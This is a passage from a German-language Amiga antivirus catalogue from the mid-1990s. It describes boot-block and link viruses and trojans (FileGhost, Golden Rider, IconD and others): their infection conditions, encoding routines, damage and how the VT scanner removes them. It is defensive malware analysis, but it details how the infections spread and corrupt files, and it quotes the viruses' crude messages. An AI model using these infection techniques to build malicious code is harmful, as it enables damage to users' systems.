erkennt dieses File jetzt auch und bietet nach einer Warnung (BRA.S FEHLT), den Ausbau an. Falls es noch mehrere Files dieser Art gibt, bitte ich um einen Hinweis. Danke Hinweis 2 Okt.94: Das Virusteil scheint mehr Verbreitung gefunden zu haben, als von mir angenommen wurde. Die aelteste mir bekannte befallene Disk stammt vom Juli 94. Ich suche IMMER NOCH den Installer !!! Ich vermute, dass dieses Teil so lange unentdeckt bleiben konnte, da auch viele sogenannte Nutzprogramme LoadSeg verbiegen. Der User ist also nicht mehr gewarnt, wenn er einen verbogenen LoadSeg-Vektor sieht. Wahrscheinlich ein Nutzprogramm, denkt er. PECH gehabt. Ich warne dringend vor solchen Programmen, da fuer LoadSeg KEINE Verkettung existiert, ist es UNMOEGLICH das Virus- teil zu finden, wenn LoadSeg von einem Nutzprogramm noch einmal verbogen wird !!!!!! Hinweis 3 Okt.94: Es sind einige verseuchte Spiele-Files aufgetaucht, die entgegen den Commodore-Richtlinien NICHT mit 3F2 aufhoeren. Bei fehlender 3F2-Endekennung, geht man normalerweise davon aus, dass das File defekt ist. Es handelt sich hierbei um Absicht von Seiten der Programmierer. VT unternimmt auch hier einen Ausbauversuch (Warntext: 3F2 Fehlt), der zu einem lauffaehigen Spiel fuehren kann nach dem Ausbau. Genausogut kann es sich aber auch um ein wirklich defektes File handeln. Fertigen Sie bitte vor dem Aus- versuch eine Kopie an. Danke - FileGhost-3-Virus Link KS1.3 : nein KS2.04 : ja KS3.0 : ja Verlaengert ein File um 1288 Bytes. Haengt sich hinter den ersten Hunk. Verbogene Vektoren: Loadseg Nicht resetfest Das VirusTeil ist codiert mit: eori.b x,(a0) eor.b d1,(a0)+ Der Wert von x wird vom VirusPrg. staendig geaendert ($DFF006) und ist deshalb bei jedem Link neu. d1 aendert sich mit der Schleife. Ich habe SEHR HAEUFIG bei Tests den GURU gesehen und auch Files mit der Laenge 0 erhalten. Vermehrungsroutine: - Filename enthaelt nicht "." oder "-" - max. Filelaenge #125000 Bytes - min. Filelaenge #2500 Bytes - File ausfuehrbar - Disk validated - mind. 8 Block frei - RTS wird gefunden ( max. loop $3e ) - RTS wird ersetzt durch bra.s oder NOP Ueberlaueft 3E8,3F0,3F1-Hunks usw. !!!!! Dieses Teil soll sich ab und zu melden, indem unterschiedliche Texte in die Fensterleiste geschrieben werden. Hab ich nie ge- sehen. Es kam immer vorher der GURU. "AUA! schlag nicht so auf die Tasten!" "FileGhost3 - the nightmare continues!" "Hallo DEPP!" "Was machst Du denn als nächstes ?" "Weißt Du eigentlich, daß Du dumm bist ?" "Und schon wieder eine Datei weniger!" "Gib mir mal `n Bier!" "Tötet alle Nazis + RAPER!" "AMIGA kills PC! (HEHE)" "INTeL Outside !" Eine Nachprogrammierung, die bei den Aenderungen FALSCH ist. Vermutlich ein Anfaenger. Da sehr schnell der GURU kommt, duerfte das Teil sehr schnell gefunden werden. Falls sehr viele Files im c-Verzeichnis befallen sind, sollten Sie ueberlegen, ob es nicht schneller geht, wenn Sie das Ver- zeichnis loeschen und von einer Original-WB neu aufspielen. Bei einer Disk sollten Sie nach mehreren Ausbauten copy df0: df1: all durchfuehren, um die Fragmentierung zu verringern. Arbeiten Sie bitte immer mit einer Kopie. - Firedom.BB Virus Cascade-Virus-BB-Clone s.o. Nur Text geaendert: (im BB lesbar) 00004669 7265646f 6d205631 2e344320 ..Firedom V1.4C Rest: siehe oben - Firedom.BB-Inst. File Laenge: 3428 Bytes Mit der Hunklab-Bootjob-Methode wurde der BB an den c-Befehl install angelinkt. 42.5 (3.3.94) ??????? Hunklab-Bootjob s.u. Die Wahrscheinlichkeit, dass ein LAUFFAEHIGER BB entsteht, ist gering. VT bietet Ausbau an. - FLASHBACK-Virus BB Block 0-3 Glasnost-Clone s.u. Unterschiede: In Block 3 ist uncodiert zu lesen: 464c4153 48424143 4b207669 72757320 FLASHBACK virus 62792053 54432120 5765276c 6c206265 by STC! We'll be 20626163 6b2e2e00 00000000 00000000 back........... Schreibt in Block, der zerstoert wird ab $100 STC! Block: 1494 00f0: 75657374 65727320 20202020 20202020 uesters 0100: 53544321 53544321 53544321 53544321 STC!STC!STC!STC! 0110: 20202020 20202020 20202020 20202020 Dieser Block kann leider NICHT gerettet werden. Das File ist verloren. Lesen Sie bitte bei Glasnost nach. - FORPIB BB kein FastMem, BeginIo, KickTag, KickCheckSum, Vec5 Vermehrung: ueber BB besorgt sich Speicher ueber MemList, Speicher fuer neuen VirusBB mit AllocMem Im BB sichtbar: - FORPIB - 09.88 - N° 197102 - usw. Clone: STARCOM 6, TAI3 siehe unten - Freedom reines Zerstoerungsprogramm Laenge: 10876Bytes Herkunft: Freedom!.LZH 8153 Bytes Fordert trackdisk.device; keine verbogenen Vektoren versucht durch Text zu taeuschen: Freedom ! by Steve Tibbett Checking df0: for 126 viruses nach kurzer Zeit wird abwechselnd ausgegeben: SADDAM-Virus removed ! oder SMILY CANCER-Virus removed ! Schaden: schreibt in jeden 5.Block (also auch Root=880) Datenmuell, der nach einigen Tracks sogar den Inhalt wechselt (vermutlich soll Blockerkennung verhindert werden). Durch die vielen zerstoerten Bloecke ist eine Rettung mit DiskSalv unwahrscheinlich. Daten also ab- schreiben und Disk formatieren. Mit etwas Glueck erkennt VT beim BitMapTest eine Freedom-Disk. Beim BlockITest meldet sich VT nicht, da der Muell von Disk zu Disk und auch nach einigen Tracks wechselt. - French.BB-Virus BB Es ist KEIN Virus. Lesen Sie bitte nach bei VT-andere.BB unter CCI-Intro.BB . Danke - FrenchKiss belegt auf Track 0 Block 0 bis 5 Ich besitze nur Bl 0 u. 1 . Ein echter Virus !!! Cool, DoIo, $6c, Vec5, immer ab $7f0d0 Vermehrung: Block 0 bis 5 auf Track 0 Schaeden: Je nach Zaehlerstand wird Track 0 ueberschrieben oder Track 80 (bei Disk = Dir ) zerstoert. Mehr kann ich nicht sagen, da ich nur Block 0 u. 1 habe. Bitte schicken Sie mir Ihre verseuchte Disk. Danke !!! - FRESHMAKER-Virus BB immer ab $78000 Cool $78154 Nach Reset dann noch: DoIo, Findres, Supervisor Vermehrung nur: mit KS1.3, da absolute ROM-Einspruenge und ExecBase im Speicher ab $C00000 Versucht durch lesbaren Text im BB zu taeuschen: 203E2056 69727573 50726F74 6563746F > VirusProtecto 72205631 2E30203C 2000 r V1.0 < Nach #10 Vermehrungen Textausgabe mit intuition. Text wird mit eori.b #$27,(a1)+ decodiert: ES IST WIRKLICH NICHT ZU GLAUBEN. DU BOOTEST MIT EINER UNGESCHÜTZTEN DISK ! ES IST WIRKLICH SCHADE (!), DAß ES SOLCHE LAMER (!) NOCH GIBT. DU HAST WOHL KEINE ANGST VOR VIREN ??? ICH WÜNSCHE DIR NOCH VIEL SPAß (!) MIT DEINEM AMIGA... UNTERZEICHNET: THE FRESHMAKER IN 1991 ! - Frity Forpib-Clone s.o. - FUCK-Virus siehe bei MODEMCHECK-Virus - fuck.device-Virus BB Cool, DoIo Namensbegruendung: siehe unten Fordert trackdisk.device NICHT Das Virusteil meldet sich nicht. Schaeden und Vermehrung: je nach dem Wert in der Zaehlzelle wird: - der Virus-BB geschrieben (#1024 Bytes) - oder Block 0 und 1 zerstoert mit fuck.device. Da hier aber $800 Bytes geschrieben werden, wird in Block 2 und 3 Speicher- muell geschrieben. Sollte ein File Block 2 und 3 belegt haben, so ist dieses File NICHT mehr zu retten. 6675636b 2e646576 69636500 00667563 fuck.device..fuc 6b2e6465 76696365 00006675 636b2e64 k.device..fuck.d 65766963 65000066 75636b2e 64657669 evice..fuck.devi Kopieren Sie mit VT einen neuen DOS-BB auf. - Future Disaster nur KS1.2, Cool, DoIo, BeginIo, immer ab $7FB00 fordert trackdisk.device (also HD nicht) Vermehrung:BB Schaden: sobald die Zaehlzelle den Wert 7 erreicht hat: - schreibt Speicherinhalt ab $10000 nach Block 0 u 1 - schreibt Speicherinhalt ab $7Fb00 nach Block 880 und weiter Folge: Disk unbrauchbar - G-Zus-Packer Laenge ungepackt: 15016 Bytes Wird in Docs als bester Packer angepriesen, aber: - das Original-File wird geloescht - ein neues File mit gleichem Namen und Erweiterung .god erzeugt - dieses neue File ist 30 Bytes lang und enthaelt nur: 0000: 54686973 49734d61 67696321 34434f1c ThisIsMagic!4CO. 0010: 27303811 10464b55 524e435b 4f470000 '08..FKURNC[OG.. Wenn Sie kein zweites Original-File haben, dann haben Sie Pech gehabt. Ist also KEIN Virus, aber vielleicht wird jemand durch die Er- kennung vor Schaden bewahrt. - Gadaffi (KickRomV1.2 Floppymusik) Cool, DoIo, KickTag, KickCheckSum - Gandalf BB Cool, ExitIntr, PutMsg BB-Teile codiert mit eor.w d1,(a1)+ decodiert ist im Speicher zu lesen: Gandalf`s Rache usw. Vermehrung und Schaeden: - schreibt sich auf BB - in Abhaengigkeit von der Zaehlzelle soll die Disk zerstoert werden. Verwechselt aber Disk-Seek mit Disk-Format, DisplayBeep mit DisplayAlert usw. (Anfaenger ??) - GCA-Virus BB Forpib-Clone nur Text geaendert 26.11.92 4765726d 616e2043 7261636b 696e6720 German Cracking 4167656e 63792028 47434129 20212121 Agency (GCA) !!! 20a92031 39383820 56312e30 20212121 . 1988 V1.0 !!! - GENERALHUNTER (L) File Laenge ungepackt: 26112 Bytes Gibt vor ein Linkvirus-Tester zu sein. Empfehlung: Loeschen Im File wurde uncodiert folgender Text gefunden: 67616265 293a2025 730a0040 5349474e gabe): %s..@SIGN 554d0049 63682062 696e2064 65722042 UM.Ich bin der B 6f62626c 652d5369 676e756d 2d566972 obble-Signum-Vir 75732028 332e4765 6e657261 74696f6e us (3.Generation 290a0044 75206272 61756368 7374206d )..Du brauchst m 69636820 6e696368 74206d65 6872207a ich nicht mehr z 75206b6f 70696572 656e2c20 64656e6e u kopieren, denn 200a0064 61732068 61626520 69636820 ..das habe ich 6a65747a 74206175 63682073 63686f6e jetzt auch schon 2073656c 62657220 64726175 66212020 selber drauf! ;...... 4e753a00 1b631b5b 33336d47 454e4552 Nu:..c.[33mGENER 414c4855 4e544552 2050524f 46455353 ALHUNTER PROFESS 494f4e41 4c211b5b 33316d20 28432920 IONAL!.[31m (C) 31393930 2c39312c 39320a00 56657273 1990,91,92..Vers 696f6e20 332e322c 204de472 7a203139 ion 3.2, M.rz 19 39320a00 53756368 742c2065 726b656e 92..Sucht, erken - GENESTEALER BB auch KS2.04 immer ab $7EC00 Cool, DoIo Im BB ist zu lesen: GENESTEALER VIRUS!!! by someone... Schaeden und Vermehrung: ueber BB Testet VBlank ( cmpi.b #$32,$212(a6) ) Sollte der Wert NICHT 50 sein, so wird der Rootblock zerstoert. Fordert trackdisk.device NICHT . - GENETIC PROTECTOR V2.00 BB Dotty-Clone s.o. 16.03.92 nur Text geaendert: GENETIC-ELECTRONICS usw. Pech gehabt: wird weiterhin als Dotty erkannt - Germany-Virus Forpib-Clone nur Text geaendert 4765726d 616e7920 21204c6f 76652020 Germany ! Love 6974206f 72206c65 61766520 69742021 it or leave it ! 21212121 21212121 21212020 20202020 !!!!!!!!!! - Glasnost Block 0 bis 3, Laenge also 2048, KickTag, KickCheckSum im Prg noch DoIo, $6c, im Speicher immer $7F000 fordert trackdisk.device NICHT. Wird aktiv wenn Block 880 gelesen wird Schaeden: blockiert nach 15 oder 20 Min. Rechner schreibt eigenen BB und zerstoert damit auch Files in Block 2 u. 3 bestimmt einen Block ueber $DFF006 durch mulu #6,d7 und schreibt in diesen Block ab $100 vier Langworte ($11111111, $22222222, $44444444, $88888888). Dieser Block kann NICHT gerettet werden. Text in Block 3: Glasnost VIRUS by Gorba!! First release Clone: siehe bei FLASHBACK-Virus, TAI13, - Golden Rider Linkvirus im Speicher immer $7C000 verbiegt Cool, DoIo, DosOpen Arbeitet nicht mehr mit Doslib-Version 35 oder hoeher. Verlaengert ein File um 868 Bytes, haengt sich auch mehrmals in ein File, da keine Abfrage ob schon befallen. File darf max 100000 Bytes gross sein. File muss executable sein. Filename + Pfad darf nur Zeichen ab A enthalten (Ausnahme / : 1 0 ) Eine Zeichenobergrenze wurde im Programm nicht gefunden. Eine Vermehrung findet statt bei: df0:Test/File KEINE Vermehrung mit: df3:Test/F9 Das VirusTeil enthaelt keine Melderoutinen. Haengt sich am Ende des 1.Hunks ein und ersetzt RTS durch ein NOP. Sollte kein RTS am Ende des 1. Hunks gefunden wer- den, so wird $38 Schritte ab Hunkende zurueck nach einem RTS gesucht und dann durch BRA.s ersetzt. In ersten Hunk des befallenen Files ist unverschluesselt zu lesen: >>> Golden Rider <<< by ABT VT versucht den Virusteil auszubauen und ein lauffaehiges Ursprungsprogramm abzuspeichern. KEINE Garantie !!! Arbeiten Sie mit einer Kopie !!!! Vermehrung getestet: ja Ausbau getestet: ja Hinweis: Da sich die 3 Testlangworte in 2 verschiedenen Bloecken befinden koennen, wird der Golden Rider nur im Filetest SICHER erkannt. Bei der Blockkette koennte einer beim Test NICHT ge- meldet werden. Hinweis 31.08.92: Ab VT2.44 sollten mehrere GoldenRider-Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - Gotcha LAMER Filevirus anderer Name: Lamer Bomb verlaengert File um 372 Bytes, DoIo nur in Files dir, run, cd, execute Schaeden: - KEINE Vermehrung ueber obengenannte Files hinaus - KopfStep - DisplayAlert u. RESET: "HAHAHE... Gotcha LAMER!!!" Ursprungsprogramm: MINIDEMO.EXE Laenge: 773 Bytes sucht fuer Link nach: dh0:c/dir, dh0:c/run, dh0:c/cd, dh0:c/execute - Graffiti BB aehnlich 16Bit Crew + 3D-Graphik FastMem ja, Cool, im Prg DoIo, im Speicher immer $7ec00 Vermehrung: ueber BB Graphikroutine mit 3D unverschluesselt im BB: VIRUS! written by Graffiti - GREMLIN BB Cool, KickSumData, im Prg. DoIo, im Speicher immer $7f400 Fordert trackdisk.device NICHT !! Vermehrung: ueber BB Textausgabe mit GraphikRoutine: roter Hintergrund, weisse Schrift GREMLIN - Gremlins-BB Fehlerquelle Stand: Anfang April 94 Bei aktivem Mount.BB-Virus (s.u.) erkennen einige Antivirus- programme "Gremlins-Virus" und versuchen die Original-Vektoren wieder zu setzen. Da die Vektorensicherung beim Mount.BB-Virus an einer anderen Stelle stattfindet, verursachen diese Prg.e einen Systemabsturz. Den Virus im BB erkennen diese Prg.e nicht. Ich nehme an, dass der Fehler in den entsprechenden Programmen beim naechsten Update (Mai 94 ?) behoben wird. VT erkennt bis einschliesslich VT2.62 "unbekanntes Programm" im Speicher. Sie koennen mit Tools/setze OVek. das Virusteil im Speicher OHNE Systemabsturz abschalten !! Ab VT2.63 (04.94) wird das neue Virusteil mit Namen (s.u.) er- kannt. - GRIM-REAPER-Virus BB Disk-Doktors-Clone siehe oben Text geaendert: 646f732e 6c696272 61727900 0000636c dos.library...cl 6970626f 6172642e 64657669 63650000 ipboard.device.. 00010400 00000097 20546865 20475249 ........ The GRI 4d2d5245 41504552 20627920 48616e6e M-REAPER by Hann 6962616c 21202020 20200000 00000000 ibal! ...... - GVP-HardDiskSpeeder-Trojan andere moegliche Namen: DiskSpeeder-Trojan Karacic-Trojan siehe dort - GX.TEAM Fastmem ja, nur KS1.2 da absoluter DoIo-Einsprung Cool, DoIo, KickTag, KickCheckSum, im Speicher immer ab $7f4d0 Vermehrung: ueber BB Textanzeige mit displayAlert (wird mit sub.b #$41,d0 nach $7f300 entschluesselt): Mais qui voila ???C'est le nouveau VIRUS de GX.TEAM !! AAAHH! Les salauds! Les ...(Insultes diverses) He!He! SILENCE : GX.TEAM entre enfin dans la legende ... BYE!!! - GYROS Cool, DoIo, immer ab $7EC00 Fordert trackdisk.device NICHT Vermehrung:BB Schaden: Sobald die Zaehlzelle den Wert 10 erreicht hat: - blockiert Rechner Im BB zu lesen: Your Amiga is fucked from a nice GYROS usw. - GYROS-SOFIA-Clone: Nur Text geaendert. Das Teil stammt nie und nimmer aus Sofia. 206f6e65 7320534f 46494120 abababab ones SOFIA .... - GYROS-SOFIA-Inst. gepackt: 1524 Bytes entpackt: 1952 Bytes Ein 3c(a7)-Link File (s.o.), das einen GYROS-SOFIA.BB im Speicher verankern soll. Das Teil war an 2.MZaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Da bei der Verankerung im Speicher, absolute Speicheradressen, die bei vielen Rechnern nicht belegt sind, verwendet werden, erscheint haeufig der GURU. - HACKERS siehe bei SHIT Unter diesem Namen wurde mir ein BB zugeschickt. Aber auch im Speicher war dieser Name nicht nachvollziehbar. - HAPPY NEW YEAR BB 21.11.92 Cool, im Programm DoIo immer ab $7EC00 Namensbegruendung: im BB ist zu lesen: 2d2b2d20 48415050 59204e45 57205945 -+- HAPPY NEW YE 4152202d 2b2d4ef9 0fc00000 43f90007 AR -+-N.....C... Vermehrung: kaum moeglich Begruendung: endlich hat es jemand geschafft, einen HunkReloc32 im BB unterzubringen. 000003ec ................ 00000006 00000000 000000e4 000000dc ................ 000000bc 0000006e 0000003e 00000022 .......n...>..." 00000000 000003f2 00000000 00000000 ................ Dies hat zur Folge, dass der OrigDoIo an einer Stelle abgelegt wird, und sobald er gebraucht wird, an einer ganz anderen Stelle im BB gesucht wird. Die Folgen sind klar. Meine Empfehlung: Anfaenger uebt weiter am Joystick. Glaubt mir, da ist euer Erfolgserlebnis groesser. - HARDEX VIRUS Disk-Val. SADDAM-Clone s.u. - HardSpeeder File s.o. bei FileGhost - Hauke BB Byte-BanditClone s.o. Text geaendert: Hauke Jean Marc usw. - Haukeexterminator I BB Disk-DoctorClone s.o. Text geaendert: Haukeexterminator I usw. - HD-SPEEDUP-Instal. File Laenge gepackt: 6376 Bytes Laenge entpackt: 6252 Bytes KEINE verbogenen Vektoren Das File kann SICH SELBST NICHT vermehren. Laut Doc. soll es sich um einen Festplattenbeschleuniger handeln. Im entpackten File ist zu lesen: 00007379 733a732f 73746172 7475702d ..sys:s/startup- 73657175 656e6365 00007379 733a732f sequence..sys:s/ 48647370 65656475 702e7072 65667300 Hdspeedup.prefs. 7379733a 732f7761 69740000 7379733a sys:s/wait..sys: 732f4864 73706565 6475702e 70726566 s/Hdspeedup.pref 7320233f 2f233f0a 7379733a 732f7761 s #?/#?.sys:s/wa 69742031 3030300a 000003f3 00000000 it 1000......... ;....... 756d6265 720a0000 000003f2 434f4e3a umber.......CON: 302f302f 3634302f 3130302f 48442053 0/0/640/100/HD S 50454544 55502056 312e3000 00000000 PEEDUP V1.0..... Ablauf: Im File sind zwei Files enthalten. Diese werden nach sys:s geschrieben. -wait (ungepackt) Ein Befehl, der auch im C-Verzeichnis vor- kommt. -Hdspeedup.prefs gepackt: 4192 ungepackt: 6124 Ein Befehl, der mit dem Namen delete auch im C-Verzeichnis vorkommt. Die startup-sequence wird neu geschrieben. Laenge bei mir immer #44 Bytes. Inhalt: sys:s/Hdspeedup.prefs #?/#? sys:s/wait 1000 Die Original-Startup geht also verloren. Bitte denken Sie ueber eine Kopie Ihrer startup-sequence mit anderem Namen in s nach. Laut Doc. soll ein Reset danach ausgefuehrt werden. Durch die startup-seq. wuerde dann die Loeschfunktion aufgerufen. Falls VT dieses Teil findet: - loeschen Sie bitte auch: sys:s/wait sys:s/Hdspeedup.prefs sys:s/startup-sequence - HEIL Virus BB Cool immer $7C070 immer ab $7C000 Bei mir mit KS2.04 nach Reset kein neuboot von Disk. Unter KS1.3 werden nach dem Reset 2 Interrupts installiert. Nr. 3 = Ports = $7C1C6 = SS.install Nr. 5 = VERTB = $7C1E8 = SS.greets VT entfernt beim loeschen die Namen und setzt die Codezeiger auf 0 mit RemIntServer. Also keine Gefahr mehr. vgl. VT = Listen = IntVec Sobald die Zaehlzelle den Wert #$500 erreicht hat wird eine Graphikroutine angesprungen: schwarzer Hintergrund, helle Schrift Hakenkreuz,SS-Rune,Hakenkreuz und dann your computer is infected by SS-Virus! Danach ist ein Reset notwendig, da das VirusPrg. sich in einer Endlosschleife befindet. Der BB ist codiert mit eori.l #"HEIL",(a0)+ Von der Definition handelt es sich nicht um einen BB-Virus, da keine Vermehrungsroutine gefunden wurde. siehe auch MOSH, SS-Virus - Hilly KickTag, KickCheckSum, Kick1.2 DoIo im Prg mit absolutem ROMeinsprung Test auf spezielle Kickstartversion (patched bei $FC0090) Falls vorhanden kein Virusaufbau. Fordert trackdisk.device nicht an, deshalb koennen Schreib- zugriffe auf die Festplatte erfolgen !! Lage im Speicher: immer ab $7f300 (ResStruc.) Vermehrung: ueber BB sonst keine Routine gefunden (keine Graphik usw.) - Hireling Protector V1.0 anderer Name: Charlie Braun ForpibClone s.o. nur anderer Text - Hochofen Link auch mit KS2.04 verlaengert ein File um 3000 Bytes KEINE bekannten Vektoren verbogen !!!! Wurde mir als Trabbi zugeschickt. Da ich diesen Namen nicht nachvollziehen kann (kommt im Prg-code nicht vor), nenne ich ihn Hochofen (im 1. Hunk zu lesen). Taskname: Greetings to Hochofen Vermehrung: NUR moeglich beim Start eines bereits verseuchten Prgs. Scannt Root durch (examine, exnext usw.) und sucht nach Files, die - ausfuehrbar ($3F3) - kleiner als 200000 Bytes - noch nicht befallen sind. Haengt sich dann als erster Hunk an und verlaengert das File um 3000 Bytes (Hunk nicht codiert). Hinweis: NICHT jedes verseuchte File ist lauffaehig ! s.u. Schaeden: Task: Greetings to Hochofen im Task: KEIN VermehrungsPrgTeil zeitabhaengig: BildschirmHintergrund schwarz rot gelb mit Maustaste wegklicken Requester Fasten seat-belt! mit Maustaste wegklicken Task wird wieder entfernt Fehler: kennt viele Hunktypen NICHT und veraendert durch einen Schleifenfehler dann den Hunktyp um +1. Als Beispiel, weil ich es da zuerst bemerkt habe: Kennt hunksymbol ($3F0) nicht und macht daraus hunkdebug ($3F1). In unbekannten Hunks werden auch in einer Schleife Bytes FALSCH geaendert. Verseuchte Files die den Computer zum Absturz bringen, ver- aendern bei mir auch die Hardwareuhr !!!! Vermehrung getestet: ja auch mit ROM KS2.04 Ausbau getestet: ja mit VT 2.37 - HODEN-Virus BB nur KS1.2, da absoluter DoIo-Einsprung DoIo, KickTag, KickCheckSum, im Speicher immer $7f000 Fordert trackdisk.device NICHT. Vermehrung: ueber BB Kennzeichen: nach fuenf Kopien wandert ein gelber Kopf von links nach rechts ueber den Bildschirm. unverschluesselt steht im BB: HODEN V33.17 Clone: COHEN-Virus - HULKSTERS-Virus BB Pentagon-Clone s.u. Text geaendert: z.B. SACHSEN/ANHALT usw. - Hunklab-BootJob File Mit BootJob wurde ein BB in ein ausfuehrbares File umgewandelt. Dieses BootJob-File wurde mit HunkLab an ein anderes File ange- haengt. Fertigen Sie bitte eine Kopie dieses Files an und unter- suchen Sie es genauer. VT sollte Ausbau anbieten. Vgl. auch TAI7-Installer, East-Star-Install, CRACKER-Ext.Inst. KIMBLE.BB-Inst., Firedom.BB-Inst. - HunkLab-Link ?? Link von VT NUR im ungepackten Zustand erkannt !!! Es soll sich um ein XCopy-Programm handeln, das es ermoeg- licht, sowohl NutzPrg.e als auch Viren vor bereits vorhandene Programme zu haengen. Ganz ehrlich. Ich verstehe die Welt nicht mehr. Wie kann eine Firma so ein Programm verkaufen, das es jedem Anfaenger AUCH erlaubt, Viren an ein vor- handenes Programm zu linken ????? ABER NOCH EINMAL: Nicht jedes mit Hunklab veraenderte Programm muss ein Virus- teil enthalten. Zu Beginn des 1.Hunks ist zu lesen: 58892f49 003c4cdf 7fff4e75 556e6974 X./I.<L...NuUnit 6564a046 6f726365 53000000 00000001 ed.ForceS....... Bitte nehmen Sie fuer den Ausbau eine Kopie ihrer Disk. Ich habe nur 5 verseuchte Files (AIBON). Da ich Hunk- Lab nicht besitze, kann ich keine weiteren Files linken. Die Routine koennte also wackeln. Bitte teilen Sie mir festgestellte Fehler mit. Danke Fileerkennung und Ausbau mit VT: 05/06.12.92 Hinweis 30.12.92: Es soll in der Szene ein modifiziertes Hunklabprogramm (oder aehnlich programmiert) Verwendung finden. Es kann also zu Verwechslungen kommen und die Programme sind vielleicht nach dem Ausbau NICHT mehr lauffaehig. Fertigen Sie also BITTE eine Kopie und ver- suchen Sie mit dieser den Ausbau. - ICE SCAClone BB Cool, im Prg. DoIo, im Speicher immer ab $7ec00 Vermehrung: ueber BB Textausgabe durch GraphikRoutine unverschluesselt steht im BB: Greets from The Iceman & The IRQ usw. - IconD-Trojan Zerstoerungsfile A4000: ja Laenge gepackt: 2384 Bytes Laenge entpackt: 4188 Bytes KEINE verbogenen Vektoren KEINE Vermehrung VT erkennt NUR das Ausloeserfile !! IconD Typ A Im entpackten File ist zu lesen: 65737366 756c6c79 210a0073 79733a70 essfully!..sys:p 72656673 2f007379 733a6465 76732f00 refs/.sys:devs/. 7379733a 6c2f0073 79733a63 2f007379 sys:l/.sys:c/.sy 733a6c69 62732f00 486f6c64 206f6e20 s:libs/.Hold on 7768696c 65204963 6f6e4465 70746820 while IconDepth 56312e33 20697320 636f6e76 65727469 V1.3 is converti 6e672079 6f757220 69636f6e 73210a00 ng your icons!.. Der Text wird im cli ausgegeben und duerfte der Taeuschung dienen. In Wirklichkeit werden die Unterverzeichnisse von sys: prefs, devs, l, c und libs durchsucht. Ausser in prefs und devs duerften da aber im Normalfall KEINE icons sein. Es werden NICHT alle Files in diesen Verzeichnissen veraendert. Unter-Unterver- zeichnisse (z.B. devs/printers) wurden bei mir NICHT durchsucht. Einige Beispiele: File vorher: File nachher: printer.device 4eb90000 08582200 N....X". : 4eb90000 08582200 N....X". 508f6608 4eb90000 P.f.N... : 0002b9b2 00b90000 ........ 09ba2200 4a81661e ..".J.f. : 09ba2200 4a81661e ..".J.f. dir 4e954a81 6700000a N.J.g... : 4e954a81 6700000a N.J.g... 42a90014 6000028c B...`... : 0002b9b2 0000028c ........ 22290004 e5894ab0 ")....J. : 22290004 e5894ab0 ")....J. icon.library 28804fef 00106700 (.O...g. : 28804fef 00106700 (.O...g. 00822f2e fff82f14 ../.../. : 00820002 b9b20014 ........ 2f052f02 4e934a80 /./.N.J. : 2f052f02 4e934a80 /./.N.J. Es werden also immer 5 Bytes geschrieben = 00 02 b9 b2 00 . Ein System dabei habe ich nicht gefunden. Die Files sind leider NICHT mehr zu retten. VT erkennt veraenderte Files NICHT, da mir die Gefahr der Fehl- erkennung bei nur fuenf Bytes zu gross ist. Falls Sie Bedenken in Ihrem System haben, weil auf Ihrer Festplatte das Ausloeser- file war, dann probieren Sie einen Filemonitor (z.B. hex). Geben Sie im Suchstring $0002b9b2 ein und untersuchen Sie in den bestimmten Unterverzeichnissen die Files. Es geht schnell. Ich habs mit dem l-Verzeichnis probiert (zerstoert war da z.B. disk- validator). Nachtrag Juni 95: IconD-Typ A hd_install.exe (KidCurry Spielname ??) . Ich habe nur das File. Laenge gepackt: 2576 Bytes Laenge entpackt: 8052 Bytes Im File ist zu lesen: 4e5d4e75 b9b2004e 6f742065 6e6f7567 N]Nu...Not enoug 68207370 61636521 0a007379 733a7072 h space!..sys:pr 6566732f 00737973 3a646576 732f0073 efs/.sys:devs/.s 79733a6c 2f007379 733a6c69 62732f00 ys:l/.sys:libs/. 7379733a 632f0057 61697420 7768696c sys:c/.Wait whil 65206368 65636b69 6e672048 44207370 e checking HD sp 6163652e 0a0074ff 4e754e75 4aacfff8 ace...t.NuNuJ... Es wird also ein HD-Install im Cli vorgetaeuscht. In Wirklichkeit werden die obengenannten Dirs durchsucht und bei einigen Files (nicht bei allen), die obengenannten 5 Bytes geschrieben. Loadwb vorher: LoadWB nachher: 0000015a 00000112 ...Z.... : 0000015a 00000112 ...Z.... 0000000a 00000003 ........ : 0002b9b2 00000003 ........ Nachtrag Juni 95: IconD-Typ B Es sind einige neue Files aufgetaucht, die den IconD-Code ent- halten. Die Namen lassen vermuten, dass es sich um Installer fuer Spiele auf Festplatte handelt. (Embryo-HD_install.exe, MCI-CARDS4 -FREE.EXE, Mortal-Kombat2-HD_install.exe, SensibleGolf-HD_install .exe, SWOS-HD_install.exe, ViroCop-HD_install.exe) In Wirklichkeit wurde der IconD-Code an Prg.e aus dem C-Verzeichnis (info, remrad usw.) gelinkt. Die Filelaengen sind natuerlich verschieden. Neu bei diesen Files: - Auf das "veraenderte" Medium wird als leerer Dir-Name geschrie- ben: biomechanic trashed your hd!! - Die fuenf Bytes aendern sich : 00 02 b3 78 00 File vorher: File nachher: 22301800 706c286a "0..pl(j : 22301800 0002b378 "0.....x 01984e95 23410058 ..N.#A.X : 00984e95 23410058 ..N.#A.X oder: 08ac001f 0004205f ...... _ : 08ac001f 0004205f ...... _ 45e8ffe0 294a0030 E...)J.0 : 0002b378 004a0030 ...x.J.0 usw. Anderer moeglicher Name: BIOMECHANIC-Trojan Nachtrag Juli 95: Es ist wieder ein File vom Typ B aufgetaucht. Filename: members.exe Laenge: 8584 Bytes Da ein Text im Cli ausgegeben wird, MUSS das Teil sofort auf- fallen. Sollte VT sich nicht ganz sicher sein, so erfolgt die Ausgabe: IconD-Trojan mit mehreren Fragezeichen. Die veraenderten Files werden von VT NICHT erkannt. - Incognito anderer Name Trojan DoIo, KickMem, KickTag, KickCheckSum, FastMem ja nur KS1.2, da absoluter DoIo-Einsprung ins ROM Vermehrung: ueber BB sonst keine Schaeden und kein Text im BB: nichts zu sehen, da trackdisk.device verschluesselt. - INDIANA JONES BB Cool immer $7E656 immer ab $7E600 im Prg: DoIo $7E690, FindRes $7E676 KS2.04: ja Fordert trackdisk.device NICHT Warhawk-Clone Unterschied: die Textausgabe ueber Graphik-Routine wurde entfernt. Vermehrung: BB Namensbegruendung: Wenn Sie im BB die $7F-Zeichen richtig anordnen, ergibt sich: ····#··#··.#·##···#·####·#···#·####······####·####·#···#·###·### ····#··##·.#·#·#··#·#..#·##··#·#··#·········#·#··#·##··#·#···#·· ····#··#·#.#·#··#·#·# 